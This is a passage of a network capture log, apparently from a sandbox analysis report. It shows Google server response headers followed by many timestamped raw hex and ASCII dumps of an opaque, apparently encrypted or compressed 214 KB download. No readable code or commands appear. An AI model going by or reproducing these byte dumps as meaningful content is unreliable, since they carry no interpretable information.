X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 214592 Date: Mon, 03 Oct 2022 14:13:31 GMT Expires: Mon, 03 Oct 2022 14:13:31 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=7Zyc2g== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-10-03 14:13:31 UTC	5	IN	Data Raw: ab ab 2c d8 9b 6a ef 0e 7a 78 9b 81 e5 5b 8d f0 c8 bf 01 52 ec d5 e4 a5 1b 24 75 ba 03 c3 a1 bf 9a 93 b9 ca cc ef b6 a2 0c f0 c8 34 d0 85 31 46 f5 89 cd 6e 9b 35 13 7a 4f 94 85 c6 5f 80 50 90 63 db 14 77 22 16 90 a5 0b 92 76 bc 51 ed 6e 73 bd 6c 62 ad 9c 3d 4d 45 10 bc 29 4d c1 1c df 44 e2 14 0d 92 8d ab 7d f6 a6 1e 4b 01 8a 6f 6f 99 20 f8 2d 83 eb 00 20 25 3f ce 5a 8a 38 8b 54 68 69 64 15 1a 70 1d 15 05 b2 3c df 2e a9 a9 98 41 d8 58 05 9c e4 7a e8 4b 9c 60 3a 94 ca 5f 1e 82 5f 2e 2c 71 31 b3 df b8 8a 3a f3 6a e9 2b 77 9a 41 46 0d 0c 13 b4 46 4a 35 17 f4 9b 28 59 de 80 81 07 4d 8e c4 a3 6b d2 bb 5b 79 76 f7 74 8a 9e 2e e1 55 32 ed 15 ca 0c 89 77 22 6e ec 66 49 03 db cb 25 6e c5 49 1c 70 78 e1 41 f2 77 6a 52 ab 4e f2 60 d2 58 64 4e 2a 08 6e 1a 1e 71 43 22 Data Ascii: ,jzx[R$u41Fn5zO_Pcw"vQnslb=ME)MD}Koo - %?Z8Thidp<.AXzK`:__.,q1:j+wAFFJ5(YMk[yvt.U2w"nfI%nIpxAwjRN`XdN*nqC"
2022-10-03 14:13:31 UTC	9	IN	Data Raw: 31 62 1e ce 70 82 d8 e0 11 b7 85 d6 e3 ab 34 4c 7c 5e 21 9e e6 db 06 f4 6c 8c 80 fb 4e de b4 57 f6 e6 8f c4 0d b9 62 85 f9 cc 11 5f be bc 5f 18 5b c1 9f 52 5e 87 4d bf 9e 2f 76 87 10 84 ad 94 fe 16 b8 8b 85 df eb 77 62 2a 74 9c 7f 13 9e 98 70 c6 83 68 90 30 f3 63 16 39 1a 9d 17 77 a2 06 71 b1 e2 18 90 6d 7e 7b 39 6b 3c b2 71 c6 8d 50 74 0a 8c 22 46 15 08 54 2b 70 3f f0 bc ab dc fc 69 c5 2b 9b 59 7e 2d ee 30 67 e9 d9 d7 1e fe 7f c5 70 cf 97 88 b7 1e 7c 81 b8 03 f7 5e 73 d6 b6 92 1d 5d f2 af 1a 95 c7 c2 62 3b 5e 61 f8 95 a3 9b ab 2b fd c1 67 c8 2e 2b 29 fc bb 13 fa a7 5b bb 38 cd bb 24 33 ff ba 17 b7 69 8d 48 f0 c2 08 7b 71 9a 3b 67 8e 45 45 3d 50 2b bf 78 f5 33 8d fa 93 3f d5 b6 04 00 a5 00 d4 e5 37 03 48 38 e6 f7 2a e8 7d bd dd ac 7f 26 da 6d d2 bb 95 f9 Data Ascii: 1bp4L\|^!lNWb__[R^M/vwbtph0c9wqm~{9k<qPt"FT+p?i+Y~-0gp\|^s]b;^a+g.+)[8$3iH{q;gEE=P+x3?7H8}&m
2022-10-03 14:13:31 UTC	13	IN	Data Raw: d6 e8 ac e6 5a 4e 8d fe d2 f2 03 53 7f b2 38 79 b0 0b 38 08 2c cd 0b f0 69 aa 55 67 e7 67 90 90 18 88 16 90 af 27 38 76 bc a4 01 62 62 03 6b 74 aa 12 8a 22 3d 50 bc 23 45 d0 10 d1 41 f3 18 62 39 8d ab 77 de 0a 1e 4b 0b 99 65 47 cc 20 f8 27 92 e1 6f 76 25 3f c4 49 81 a9 8d 45 63 71 6a a4 9a c7 c6 64 c8 93 8e cf 76 0b 25 cc 29 bb 06 8b 32 80 04 9b 4c c7 0d 1a f6 87 3d 61 f9 5e 34 4e 14 10 ae cb d6 aa 59 41 5b ab 63 32 bd a2 9e 06 11 3d b9 41 68 8d 15 f4 9d 3b 5c cf 85 d4 41 43 8a a0 0c 68 d2 c3 87 4f 40 f7 74 80 97 41 b7 55 32 07 06 cc 1c 84 67 2d 78 fd 5e c4 b4 b4 bb 25 6e cf 58 1a 74 70 be cc 45 18 32 52 ab 44 da c6 d2 58 6e 26 b2 0a 4e 1c 18 59 dc 20 ca 63 82 f1 6c 68 33 61 6f ba 2a d7 e0 11 67 78 0b e2 8c b3 4c 33 97 51 40 af 6f eb 99 9a d7 b8 4c 92 ca Data Ascii: ZNS8y8,iUgg'8vbbkt"=P#EAb9wKeG 'ov%?IEcqjdv%)2L=a^4NYA[c2=Ah;\AChO@tAU2g-x^%nXtpE2RDXn&NY clh3ao*gxL3Q@oL
2022-10-03 14:13:31 UTC	17	IN	Data Raw: ca 03 b9 d6 85 f9 cc a5 db 91 ec 5f 19 45 fd f9 47 76 23 65 95 94 09 5b db 3f c2 85 52 f6 3e cd 9f 08 de c3 23 63 3e 6a a0 71 8f 9e 9e 7c fa ee af 92 3a ee f8 83 3e 1a 9c 1b 6a a0 3a 29 2f e2 1e 38 4c 78 05 24 61 30 be 4d b6 47 52 72 24 d2 ad 41 13 67 18 38 74 24 56 a3 9b 3d 94 6b c3 8f 28 54 73 11 b4 18 fb e3 d5 cf 34 50 63 c5 7a e7 bd ec 8f 19 62 0b 77 1b df 29 67 5b b7 30 14 74 b6 bb 0e b7 73 b0 60 31 4c 61 18 97 a3 9b bf 8e 89 c3 67 cf 12 6b 3d d4 2d 3b dc ad 73 5b e5 0a b1 0c e3 f9 92 22 8d 07 78 9b 3b ed 49 53 ba 92 13 4b 98 c8 44 3b 78 78 ab 6c eb 33 22 fa 93 3f 92 40 04 00 a5 22 7e f7 12 2d 56 13 e6 fd 21 d6 02 97 ea aa 57 04 04 6d d2 97 bd bc 58 20 81 38 a6 57 1d 61 28 65 60 3e 1e 3e e1 a8 1c ce 67 4a 2f d4 13 90 d4 c8 9e f5 fe 1a 00 93 0c bd e7 Data Ascii: _EGv#e[?R>#c>jq\|:>j:)/8Lx$a0MGRr$Ag8t$V=k(Ts4Pczbw)g[0ts`1Lagk=-;s["x;ISKD;xxl3"?@"~-V!WmX 8Wa(e`>>gJ/
2022-10-03 14:13:31 UTC	18	IN	Data Raw: cd d5 5f fb 48 fc a7 48 a2 c0 4a be 70 97 97 e8 48 45 76 16 d3 38 5a 64 0c 39 66 51 ec 2a b2 3a 34 3d c3 17 57 91 f7 96 ee bf 14 6f d8 7d d5 28 1f ac b1 a8 a3 50 ec 3f 39 85 54 db b5 bf f4 75 6a b7 4e 2e a2 4b cc a5 65 32 80 82 23 a2 14 a5 a2 bd 9e 4d 70 8c 3f 46 7c 0e 12 d2 59 a2 00 46 6f 39 00 f7 ea 39 82 b2 cd 54 ad 7c ba 72 4c 7c 2e e9 df 1d 74 42 a2 de b9 cc 1e 96 3b 57 c6 ac 58 64 3d 3d 00 05 fa 1d 0f 90 0c 1c f7 db 95 ef 0d ed f7 31 09 d8 ce c2 0a 2b 4b da 96 df 89 cf 44 9e fe e9 6c 10 56 0d cf 36 7c de c3 eb 08 26 a8 b0 f7 42 8f 57 74 a3 87 81 84 7d 55 0b 90 a5 0d 81 70 ad aa 03 68 71 7e 5a 62 ad 98 15 7f 47 50 ba 38 4b ba 7a df 44 e6 3c 2b 92 8d a1 12 60 a6 1e 4d 27 9b 68 00 34 20 f8 27 ae 23 de 04 34 38 bb 60 8a b8 8a 78 64 76 7c da 2e 70 a9 1d Data Ascii: _HHJpHEv8Zd9fQ*:4=Wo}(P?9TujN.Ke2#Mp?F\|YFo99T\|rL\|.tB;WXd==1+KDlV6\|&BWt}Uphq~ZbGP8KzD<+`M'h4 '#48`xdv\|.p
2022-10-03 14:13:31 UTC	19	IN	Data Raw: 51 e4 3c 2b 42 a7 e7 1a e8 18 73 f4 e1 99 b8 11 3a 7e e2 c6 f4 f5 ea 40 42 fa 75 3c 65 54 95 e2 19 bc 1c 53 d2 6c 1e 59 7e a1 db 94 1b 3a e6 09 02 e4 67 54 73 eb 6e 1e c0 81 e2 82 8d eb 63 02 13 49 ea 26 ff c1 7b 50 ca 70 0d 13 a7 7d f6 10 75 90 2e ce 04 53 7e 22 ea d4 ab d5 a1 3f 54 db d1 f8 b5 3b 8a f4 fc 3f 86 bd f2 ae 4b 33 3c 92 90 10 29 99 66 09 70 5b 68 dc de c8 da 9e e4 20 5b 2c 21 18 6b 32 95 df 87 a1 10 3b 66 e5 c5 aa 2d db 58 44 de 15 12 84 df 0c a4 99 98 d4 6e c5 31 66 f2 d8 59 2f 1e cf 69 2f c0 f7 2f cc 8a 74 f4 06 2a 43 d8 92 21 9e ed 75 05 f9 0a 81 8d 75 fd 7a 79 57 f6 ed 8f dc 18 88 07 25 e8 c5 a9 43 1a 6e 5f 18 50 4b fc 5f 4d 8f 74 9b 8a 3b 6b 0c 6b d6 ad 95 e7 2e da 99 93 ce 5f 32 72 3d 68 28 48 03 86 88 ea ff d6 71 86 a6 f9 fe 14 2f 86 Data Ascii: Q<+Bs:~@Bu<eTSlY~:gTsncI&{Pp}u.S~"?T;?K3<)fp[h [,!k2;f-XDn1fY/i//t*C!uuzyW%Cn_PK_Mt;kk._2r=h(Hq/
2022-10-03 14:13:31 UTC	20	IN	Data Raw: 8e bc 58 6b 96 e6 9f 5f 09 9f 29 73 9e 3f 16 e5 1c a9 1c 3b 70 62 1e c4 13 9a c2 13 9f e3 01 00 50 ba 00 ee ce 93 38 8a 6e c5 89 c1 ee 8f a3 64 ed f7 d7 da df cd db 64 c2 60 cb ad 65 a4 1c 31 8f 5a 96 83 c0 76 45 76 1a f5 43 5e 52 03 1c 62 79 20 3b 82 3f 1c ad c3 17 5d 96 c8 96 ff a3 34 69 3e 9a d5 28 15 ae ae 39 9f 7c e5 3f 5a e5 5c d9 c4 a3 ea 78 6e 96 9b d2 a3 61 e8 be ce 32 8a eb 4b 98 14 af 78 bc b6 65 4f 95 c1 4d 5d 34 5b e8 59 a8 da 33 53 15 06 f4 ad ea 82 b2 c1 ae b5 0a 8c 7b 57 86 07 08 d4 15 01 68 90 de b3 cc 2a a4 3b 5e db 6b 95 48 3f 25 0f 7e c5 07 f1 95 08 de 8b e1 93 c7 3a c5 5a 3b 1e f6 57 14 06 36 55 de 8e c7 18 5b 68 8f 86 c0 69 01 57 7f b6 1e d0 df ac 3e 1e 17 bb be fd 69 a9 50 8d cd 02 83 93 7a 21 1f 8e 5b 0e be 74 97 ab 2a 08 8c fa 93 Data Ascii: Xk_)s?;pbP8ndd`e1ZvEvC^Rby ;?]4i>(9\|?Z\xna2KxeOM]4[Y3S{Wh;^kH?%~:Z;W6U[hiW>iPz![t
2022-10-03 14:13:31 UTC	21	IN	Data Raw: 5a 64 08 02 3b 4e 1a 14 f1 48 22 ca 61 77 db 6a 68 39 26 3d ba 2a db 9c 18 77 7e 10 8a 95 a3 4b b7 22 21 4b 51 6e be a4 85 c6 d8 4c 92 c4 5a 2a 7c 1e 64 77 2f 42 e3 27 a2 5a a0 f1 71 c0 c4 76 fe f0 9c b6 11 87 d0 9a 7b 68 e9 62 ea 44 f8 74 36 52 77 93 fd 1c 63 c3 df 50 68 c3 e6 7d bb b8 1a 86 21 d5 11 74 c5 91 54 77 c9 41 eb c0 87 c0 ba a5 13 69 82 10 5a e0 0a 84 61 7e 5a c9 1d 44 48 59 76 e7 04 37 7f 24 20 9f 9c 17 f1 fd 02 22 cc a9 3d 55 ce f4 da b2 2d 91 79 e3 21 ae 40 2f d4 44 22 37 86 9e 09 c9 89 41 9e b9 7a 91 dc da ea c2 91 6a 91 ff 9d 21 18 60 a1 90 e7 d1 a4 cd 61 64 f4 c9 be 1a 07 6b 5d aa 25 b3 84 db 24 bf 91 8c fa 9d f4 31 60 e3 d5 57 2f 1e ca a7 1c d4 f8 39 df 98 fe d6 10 43 5c 54 10 25 b6 e7 d5 14 f0 3a a3 80 fb 40 76 f2 57 f6 e8 f0 d3 12 91 Data Ascii: Zd;NH"awjh9&=w~K"!KQnLZ\|dw/B'Zqv{hbDt6RwcPh}!tTwAiZa~ZDHYv7$ "=U-y!@/D"7Azj!`adk]%$1`W/9C\T%:@vW
2022-10-03 14:13:31 UTC	23	IN	Data Raw: 21 b7 69 83 4c e8 e8 5d 7d 59 a3 13 4d 84 c5 4a 3b 78 7d 87 a6 ff 1b be d2 97 35 ba e6 6b 0e ae 28 aa 88 25 04 60 19 ce f3 2c c0 0e d0 d3 ab 57 04 b5 7e d5 bd b7 aa a6 60 c2 14 86 29 14 61 28 61 62 86 36 87 e0 a8 1a 52 b1 4a 2f ce 3b a3 d4 ed 94 75 f6 01 30 92 34 7c e6 6e 39 a2 6c ed ba c7 81 8b a9 ba e8 bd ed ed df c7 c7 89 c7 60 f8 ad 65 a8 ad 3f 89 70 9d fc d3 77 45 7c 43 d9 27 5f 5b 0c 39 66 7b 99 00 f8 3c 1c 08 ac c0 5d b9 c2 be dd b5 39 5b 2b 93 d5 28 11 8c ea ef 9a 50 ec 3f 5a 8c 5d d9 c4 e6 e6 74 6e 95 ab 28 a2 4d e2 f9 6b 33 8a e7 a4 b1 15 af 76 fa 97 78 38 85 3f 4c 75 24 9d fa 13 a8 de 4a 07 1c 07 f0 8f 70 b1 b2 c7 82 2f 0e 8c 72 48 53 1d 5a d4 1d 72 6e 93 66 91 8c 36 a9 3d 38 c5 94 94 6e 15 0e 02 7e c6 9d 06 94 24 d5 2b d5 b6 ef 08 ed f7 31 14 Data Ascii: !iL]}YMJ;x}5k(%`,W~`)a(ab6RJ/;u04\|n9l`e?pwE\|C'_[9f{<]9[+(P?Z]tn(Mk3vx8?Lu$Jp/rHSZrnf6=8n~$+1
2022-10-03 14:13:31 UTC	24	IN	Data Raw: fe 82 42 4d 8a 8e cd 02 d2 c9 8c 79 1e f7 73 90 60 2f cd 58 4c 5e 15 c8 09 84 19 42 6e ec 5c 51 08 db c4 3c 90 c4 65 15 0e 35 ba 42 f6 5b 43 48 a0 4e f5 7b 2c 59 48 06 28 88 1d 1a 1e 75 5d 29 ca 62 bd 29 6d 44 3b 16 32 ba 2d c1 0d 17 5a 77 64 b6 9a a2 4f 91 0f 23 33 af 68 f9 76 9d 94 de 58 6c c6 14 2f 7e 18 11 2e 1c 42 e5 27 3b 58 a0 f6 63 e3 19 5f fc e7 95 a9 1f aa 37 e5 5e 6a c2 63 fa 31 05 8b cf 50 44 93 fd 05 d3 c9 df c8 6d 1e 58 40 bb b8 09 8f 36 de 83 0b cc 91 54 7b ff b8 e8 ec 96 96 80 a5 13 67 7c 07 5a e0 0a 36 32 7b 5a c3 25 a2 13 a7 77 fa 12 67 81 2d 5f bd 7b 68 d4 f6 05 3f 9a bf 3f 55 cc 7e f6 bd 21 9b f1 f5 2d 50 45 de a5 46 35 49 9b 81 1d 33 2a 72 8a cb 73 99 c4 20 c3 e7 81 42 93 d7 ae 27 77 4b 20 99 ed be 82 11 3b 6b fe d0 b0 05 29 47 4b 2a Data Ascii: BMys`/XL^Bn\Q<e5B[CHN{,YH(u])b)mD;2-ZwdO#3hvXl/~.B';Xc_7^jc1PDmX@6T{g\|Z62{Z%wg-_{h??U~!-PEF5I3rs B'wK ;k)GK
2022-10-03 14:13:31 UTC	25	IN	Data Raw: b3 ef 81 1e 76 29 99 2e df 2f 7b 08 b0 1a 15 65 a2 af 1a 9f ef b0 7b 20 58 45 f7 95 a3 9c b2 33 86 c3 37 ce 06 7f 15 fc b1 2a f4 96 59 bd e3 22 89 25 33 f3 ba 1a b5 69 81 4c f7 ea 5d 71 7c 82 10 59 9d 41 51 3f 6e 6b be 6e ec 1e ac ff 85 26 bc f2 02 14 bc 2f b2 e0 21 2d d6 13 e6 f1 0a c7 20 8c dc aa 5d 04 04 7d f1 95 8b bc 58 6b 91 2c ac 7f 2a 61 28 6f be 3e 18 e7 e1 b8 1c 3d 66 4a 2f c4 2d ae d4 fd bb f5 ff 00 2b a6 0f e6 6c 6e 39 8a 55 ed ba d0 c6 b2 a8 ba e8 c5 f3 f4 cc c9 d3 04 f2 49 fc a7 6f b7 d1 35 8e 1f eb 93 c0 7c 2a 43 1d f5 30 2a 8c 52 30 75 21 37 25 f7 39 1c 0e c3 17 5d b9 c8 56 11 4a c6 96 54 65 2a f9 ea 58 4c 27 61 af 13 e7 06 93 58 d4 c6 cc f6 75 6e 9f 83 2c a2 4d 2b 69 9a cd 54 cd be 87 14 af 7d b1 45 66 4e 9a c1 4f 2e 2f 33 2c 58 f7 20 5d Data Ascii: v)./{e{ XE37Y"%3iL]q\|YAQ?nkn&/!- ]}Xk,a(o>=fJ/-+ln9UIo5\|C0R0u!7%9]VJTe*XL'aXun,M+iT}EfNO./3,X ]
2022-10-03 14:13:31 UTC	26	IN	Data Raw: cf 64 4c 28 cc 29 bb 3a 20 83 d4 14 8f 33 ec 08 96 75 ab 31 71 fe 2d 1f 4b 02 21 7e 74 ce bb 57 b1 4d bc 60 4b db 2c 29 63 b5 e3 b3 43 6c 17 1f 9b fa 28 59 d4 5c 0f 5a 4a a2 8e a5 07 b3 c9 8a 6d c9 29 78 a2 a8 2e e1 5f 1a 3a 15 c8 07 5c 76 03 6e ad 3e 4a 03 d9 c3 25 6e 54 49 1c 70 35 ba 42 f2 93 4a 52 ab 42 f2 60 d2 58 64 0e 2a 0a 4e 1a 1e 09 41 22 ca 1f aa d7 6c 9a 39 0e 39 b0 2a dd f3 16 76 7e 1a e7 9a a2 4b e8 20 3e 38 06 6f e1 88 62 b8 d1 4c 98 c0 72 2f 7e 1e 62 5f 1c 42 e3 2d 22 53 a0 f1 7f 1c 18 73 f4 f1 9e a9 14 b4 c9 e4 57 68 e9 67 d1 72 f3 74 3e 78 44 93 be 16 e3 db c9 43 67 26 a7 79 bb b8 18 88 31 fd f6 0b e0 9b 43 fe d0 46 e9 c1 8c f4 9a ae 13 72 09 03 a4 e1 22 51 f9 00 5a c9 1f 40 00 ac 77 f4 10 77 7f 24 6c 89 82 7d d0 27 00 26 e2 b6 b2 52 c8 Data Ascii: dL(): 3u1q-K!~tWM`K,)cCl(Y\ZJm)x._:\vn>J%nTIp5BJRB`XdNA"l99v~K >8obLr/~b_B-"SsWhgrt>xDCg&y1CFr"QZ@ww$l}'&R
2022-10-03 14:13:31 UTC	28	IN	Data Raw: b5 2e 0b b8 ca e2 33 64 6f 16 20 43 c0 b7 59 98 83 78 91 20 c5 26 35 47 66 19 21 7d 37 44 86 be f3 f9 db c5 2d 33 43 63 3d 34 30 67 e3 d7 d2 2f cb 6a aa 25 ca bf cd d8 d6 76 23 bb 0a d9 04 51 c7 b6 5f dd 75 a2 a5 6e f4 ef b0 61 28 5d 58 d7 bd 47 9f a9 05 e1 95 66 ce 0c 10 3c fc b1 31 d0 b6 5d d2 28 0a bb 2e 1e 2e 4c 24 a6 6f ab 63 d5 ec 32 1a 71 90 19 91 86 56 47 10 3d 7b a7 4b be 1c d1 ad 92 35 b0 6c ad 00 af 29 88 bf 36 05 6a 3b bf f6 2c ca 64 9c dd aa 57 0e da 6d 44 fd e6 9f 58 61 9d 38 a6 57 8d 21 73 7d 48 64 1f cd ea 80 47 3c 66 40 07 21 11 90 d2 c5 ad f5 ff 0b 23 92 1d e2 ec b0 2b a2 5e ed ba cb c6 63 aa ba e4 d8 d7 db df cd db a9 c6 4e d6 ac 79 ae c2 33 88 43 97 a9 ad 76 49 76 1c f5 3a 21 52 0c 39 aa b1 21 3a 97 3c 1c 0f 29 15 75 ae c8 96 e4 b7 2f Data Ascii: .3do CYx &5Gf!}7D-3Cc=40g/j%v#Q_una(]XGf<1](..L$oc2qVG={K5l)6j;,dWmDXa8W!s}HdG<f@!#+^cNy3CvIv:!R9!:<)u/
2022-10-03 14:13:31 UTC	29	IN	Data Raw: d5 4f 45 56 cf 49 4c c1 16 a5 37 4a 14 0d 94 86 ac 7e 8b c3 1e 4b 05 8d 6d 14 cf 20 f8 29 fe 9a 00 20 21 38 cc 5e e5 1e 8b 54 6e 1a 1d af 14 74 a7 19 e0 76 84 de 68 48 85 cb 57 85 2b 25 e6 eb 65 8f 39 f9 26 12 f0 a5 34 0d 9d 2b 0e 4a 13 07 bc c6 d6 aa 57 9a 48 d6 3e 24 ba 28 46 0a 68 3d b3 f3 2e 6c 7e f4 9b 2c 5e d0 84 ac 2c 4d 8e 8c a5 66 d6 b4 e7 67 15 f3 73 84 9a 53 8e 55 32 09 17 cf 62 1e 76 29 68 eb 58 31 59 db c3 21 01 a6 48 1c 7a de d4 3f 98 77 4a 56 a9 5c f3 65 bd f8 64 0e 2c 0d 21 73 1e 71 4b 20 cd 0a 0f d7 6c 6e 3b 75 61 ba 2a d9 f4 79 12 7f 1a ef 9d 88 58 8d 25 3e e1 af 6f e1 d8 9c b8 c0 4e e9 9e 72 2f 7a 09 51 54 34 be e2 2d 24 20 c0 f0 75 17 62 77 80 95 9f a9 12 db af e5 72 62 e5 18 a7 43 fa 7e 23 7d 56 94 d5 71 e2 ca d5 5d 64 08 6a 75 bf ae Data Ascii: OEVIL7J~Km ) !8^TntvhHW+%e9&4+JWH>$(Fh=.l~,^,MfgsSU2bv)hX1Y!Hz?wJV\ed,!sqK ln;ua*yX%>oNr/zQT4-$ ubwrbC~#}Vq]dju
2022-10-03 14:13:31 UTC	30	IN	Data Raw: 1c a2 5f f9 35 5f 18 5b 94 8b 50 5e 85 74 84 9c 3e 7b ee a3 d6 ad 92 9a 43 a1 89 85 dd d2 32 73 20 03 d3 59 13 9a 8f 67 ff c2 15 f8 3a e8 ea 1f 28 0b 97 74 03 dd 2e 01 b7 f3 0f 23 68 14 6e 24 6b 38 a7 48 8f 8a 2d 1e 22 c5 24 57 02 76 16 56 1d 35 52 b1 a2 e5 87 64 b8 43 39 50 63 14 b1 18 29 e3 d5 cf 61 ef 63 c5 74 c2 a9 f6 a8 0f 67 32 b7 1b a4 73 71 d6 b4 36 0b 5b 74 be 13 49 fe b8 b6 32 37 90 d2 95 a9 e0 d9 03 8e c7 76 c6 10 4e 3c fe b3 40 80 a7 5b b9 e3 15 95 f2 22 f0 44 39 a6 06 23 64 c4 ec 55 6a 60 ff 77 4c 8e 4f 45 24 56 68 b6 ae ee 13 68 f3 45 e3 b0 e6 06 7b f3 28 a0 e3 b9 b2 5f 0e 18 08 d3 c8 22 bf dd aa 4c 3e d3 6d 1b bd bd bc 0b 61 9d 29 a2 7f 6f 60 28 6f 6b 39 36 f0 e0 a8 16 10 61 4d 07 fa 13 90 de cb 9a dd c2 01 30 9c 20 e4 f1 44 3d 92 70 9e fa Data Ascii: _5_[P^t>{C2s Yg:(t.#hn$k8H-"$WvV5RdC9Pc)actg2sq6[tI27vN<@["D9#dUj`wLOE$VhhE{(_"L>ma)o`(ok96aM0 D=p
2022-10-03 14:13:31 UTC	32	IN	Data Raw: 1b 29 4e 20 86 f7 e5 4d 57 9a f8 eb 6d 1f ad 78 92 34 57 da 94 69 f7 d9 5d bc ee 61 f8 c1 74 94 a9 ef 87 19 a4 c0 28 8f 0f 92 65 8c aa 12 13 71 05 6c 3a ad 9c 2c 5b 56 56 84 46 4f c1 1c df 55 e4 0f f3 93 a1 a3 45 1c a6 1e 4b 1d 99 69 6f 88 26 e7 3b 7d ea 2c 39 26 3d b5 00 8a b8 8f 3b 0b 66 7b a5 05 74 73 a4 b5 f8 84 de 66 7b 9f df 2f b1 3a 23 f3 83 eb 8e 15 e9 0f 61 ad ab 31 74 e5 3d 06 c0 a3 7e b9 aa d6 a0 4c 8b 59 ab 64 35 bc 32 d7 68 45 31 bb 48 2f b2 17 f4 9d 24 46 d7 93 d7 42 5c 88 97 ab 96 d3 e5 b6 65 6e ad 74 8a 9a 32 6c 64 32 0d 14 db 08 93 73 3f 71 bc c6 5b 06 cc dc 6e f2 d4 4c 04 69 fa ab 47 eb 6d d6 43 ae 54 ed 74 4e 49 61 15 3c 94 5f 1f 08 6d 2e 5a ca 65 a0 c8 66 7b 3f 0e 28 bc 35 d6 0d 17 5a 74 3a e5 92 a2 4b b0 3f 32 2b a9 6f f0 8e 8b 46 d0 Data Ascii: )N MWmx4Wi]at(eql:,[VVFOUEKio&;},9&=;f{tsf{/:#a1t=~LYd52hE1H/$FB\ent2ld2s?q[nLiGmCTtNIa<_m.Zef{?(5Zt:K?2+oF
2022-10-03 14:13:31 UTC	33	IN	Data Raw: df 06 a3 89 e3 84 b5 c7 3b 7f fa 46 58 2f 0f c8 65 2f 2f f9 15 c1 85 ad bf 09 3d 51 57 6b 44 9e ec d3 3c 76 13 90 8a ed 52 99 83 57 f6 e6 32 dd 04 97 13 96 ff d2 4d 57 ba e7 5c 63 20 e9 ed 54 72 f3 7c 86 98 2f 61 87 27 cc 53 95 d8 25 c9 f2 df d9 c3 27 42 2a ff b4 59 3b 1e 9f 76 e4 d0 70 ff 42 e8 ee 04 26 01 8f 1c 7e a5 28 1e a7 1c 1f 1e 7e 6b 7e 7e 6b 3c b2 5e 10 38 e6 5a a2 c4 20 4c 05 7f 76 53 70 35 58 aa a6 e7 90 6b d4 2b 26 48 99 04 8c 27 65 98 8f c5 1c 84 75 ed f0 ca bf cd a1 06 19 5b b1 19 d5 30 68 c5 b6 30 05 73 b9 51 1b b3 e6 ce 01 3b 58 4d de 89 b0 9b a9 12 88 d4 99 cf 2a 7c 31 ef b7 3b cd a1 44 ae 1b 0b 97 06 31 82 c8 28 b7 6d 85 67 bf 8d 5d 7b 75 ff 8d 4d 8e 43 6b ba 79 79 b5 6e e5 74 c6 fa 93 3f a5 f4 17 06 af 39 a6 f8 22 fb 61 3f fc f5 57 9a Data Ascii: ;FX/e//=QWkD<vRW2MW\c Tr\|/a'S%'BY;vpB&~(~k~~k<^8Z LvSp5Xk+&H'eu[0h0sQ;XM\|1;D1(mg]{uMCkyynt?9"a?W
2022-10-03 14:13:31 UTC	34	IN	Data Raw: e3 29 4d 3c a1 f1 7f 77 1a 08 a3 f0 9e ad ce 9c 4b e5 72 62 ff 78 ad 3a fa 74 3a 65 48 80 f9 16 f2 ce c1 ae 6d 32 4f 7a c0 e2 18 99 3e f0 20 8b cd 91 5e 65 fb 29 91 c0 81 e2 96 ac 00 67 02 08 5e fb f0 58 ed 63 58 b2 45 5b 13 a3 68 c9 71 43 03 24 40 b9 93 77 97 85 02 26 ee bd 2c 51 c8 cd ed ad 38 65 f8 c6 2b d0 25 f2 ae 45 2e 28 92 92 19 37 99 69 98 ca 8d 90 f0 c9 c0 b0 c9 6a 97 d3 aa 09 9a 6b 21 93 f1 cf cf 68 3b 61 fe d6 b2 16 25 58 55 d0 33 bc 7a de 20 a2 91 f7 a6 b5 c7 35 76 c1 d4 5f 2f 14 d8 60 4f a9 f8 39 d7 98 c6 f6 0d 3d 44 50 0c df 9f c0 c0 16 8d 48 90 80 ff 55 db d3 d7 f7 ec 27 db 0f fe 6b 87 f9 c0 ae 45 92 ec 4e 1c 4e f1 13 51 72 ff 67 ee c4 2f 70 85 27 